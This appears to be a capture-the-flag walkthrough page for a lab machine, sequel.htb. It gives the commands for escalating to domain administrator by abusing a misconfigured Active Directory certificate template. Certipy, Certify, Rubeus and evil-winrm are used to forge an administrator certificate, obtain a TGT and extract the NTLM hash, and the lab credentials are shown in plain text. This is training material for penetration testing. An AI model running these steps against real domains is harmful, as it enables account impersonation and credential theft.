Administrator

Exploit without a shell

View vulnerable certificates

certipy find -u ryan.cooper -p passw -target sequel.htb -text -stdout -vulnerable

Forge a new certificate

certipy-ad req -u ryan.cooper -p passw -target sequel.htb -upn [email protected] -ca sequel-DC-CA -template UserAuthentication

Get the TGT and NTLM hash

certipy-ad auth -pfx administrator.pfx

Exploit via shell on machine

.\Certify.exe find /vulnerable

Enrollment rights are set for Domain Users as well which can be leveraged if you're in that group

We are requesting a ticket for our user but saying that our user is the administrator

.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

Port 5986 (winrm) is open

Move the Private key contents to a key.pem file and the Public key to a key.cert file

evil-winrm -S -c key.cert -k key.pem -i dc.sequel.htb

Port 5986 is closed

Put certificate contents into a cert.pem file and convert to pfx

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Upload Rubeus and newly made cert.pfx

.\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap

/getcredentials /show /nowrap gives us the NTLM hash of the user

We can either use the ticket to login or the NTLM hash

PreviousRyan.CooperNextSilver Ticket - Alternate Route

Last updated

Was this helpful?